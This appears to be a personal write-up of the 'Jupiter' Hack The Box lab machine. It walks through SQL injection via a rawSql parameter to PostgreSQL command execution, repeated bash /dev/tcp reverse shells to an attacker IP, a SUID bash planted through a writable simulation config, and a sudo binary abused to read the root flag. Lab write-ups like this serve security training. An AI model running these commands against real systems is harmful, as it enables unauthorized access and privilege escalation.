In this walkthrough, I will go through medium htb box 🙂
As usual there are two ports open 22 and 80.
Let’s visit the site 🙂
Lets add jupiter.htb to our /etc/hosts file .
I used ffuf and found one subdomain
kiosk , add this to /etc/hosts.
Use Burp to visit the kiosk.jupiter.htb & then check the http history 🙂
Now send this request to Repeater 🙂
Change the rawSql param value to
"CREATE TABLE cmd_execd(cmd_output text); COPY cmd_exec FROM PROGRAM 'bash -c \"bash -i >& /dev/tcp/10.10.X.X/4444 0>&1\"'"
Now your modified req will look like this 🙂
Note : Dont forget to start nc listener 🙂
And GG you will get the revshell 🙂
Now we have got postgres user
In /dev/shm we can see the .yml file of juno and we have perm to write into it 🙂
Lets upgrade the shell and edit the network-simulation.yml
general: # stop after 10 simulated seconds stop_time: 10s # old versions of cURL use a busy loop, so to avoid spinning in this busy # loop indefinitely, we add a system call latency to advance the simulated # time when running non-blocking system calls model_unblocked_syscall_latency: true network: graph: # use a built-in network graph containing # a single vertex with a bandwidth of 1 Gbit type: 1_gbit_switch hosts: # a host with the hostname 'server' server: network_node_id: 0 processes: - path: /usr/bin/cp args: /bin/bash /tmp/bash start_time: 3s # three hosts with hostnames 'client1', 'client2', and 'client3' client: network_node_id: 0 quantity: 3 processes: - path: /usr/bin/chmod args: u+s /tmp/bash start_time: 5s
After this execute /tmp/bash -p to get the shell as juno
But we cannot read the user.txt because of uid ………………. but there is shadow-simulation.sh file in the home dir . Lets add the revshell to that script.
Our updated shadow-simulation.html will look like this
#!/bin/bash cd /dev/shm rm -rf /dev/shm/shadow.data /home/juno/.local/bin/shadow /dev/shm/*.yml cp -a /home/juno/shadow/examples/http-server/network-simulation.yml /dev/shm/ bash -i >& /dev/tcp/10.<ip>/4444 0>&1
After getting the shell as juno we can read the user.txt
User – Jovian
If you check the id the cmd you will see that juno belong to science group which gives access to
'grep -rie token‘ in
/opt/solar-flares/logs/ to find the right token of jupyter in the logs based on date.
lets use chisel to port forward 8888 and use this token
Now lets use that token of the current date 🙂
After getting logged in we can exec cmd in flares.ipynb file
//RUN import os; os.system('bash -c "bash -i >& /dev/tcp/10.10.<ip>/4444 0>&1"');
After executing it we will get the shell as Jovian
sudo -l to check if there is some binary we can run as root user
Jovian can run
/usr/local/bin/sattrack as root. We can get some infos about this executable by using the
strings tool and then grep the output to see if it calls some config file
strings /usr/local/bin/sattrack | grep -i config
Look for it in the filesystem and copy it in the
find / -name config.json 2>/dev/null cp /usr/local/share/sattrack/config.json /tmp
Now by running the sattrack executable as root we can see that it’s able to download in the working directory any file specified in a particular section of the
config.json file. Let’s try to exploit this feature by requesting the
root.txt we want to read.
tlesources section and replace any of the 3 url with
file:///root/root.txt as shown below
"tlesources":[ "file:///root/root.txt", "http://celestrak.org/NORAD/elements/n...", "http://celestrak.org/NORAD/elements/g..." ],
Save the new
config.json and simply run sattrack as root. Enjoy the flag!
sudo /usr/local/bin/sattrack cat /tmp/tle/root.txt
This box is pretty interesting and stressing at the same time, if you have personal instance then no problem 🙂 I would like to rate this box 5/10.
Have a nice day !
Jay Shri Krishna ❤️❤️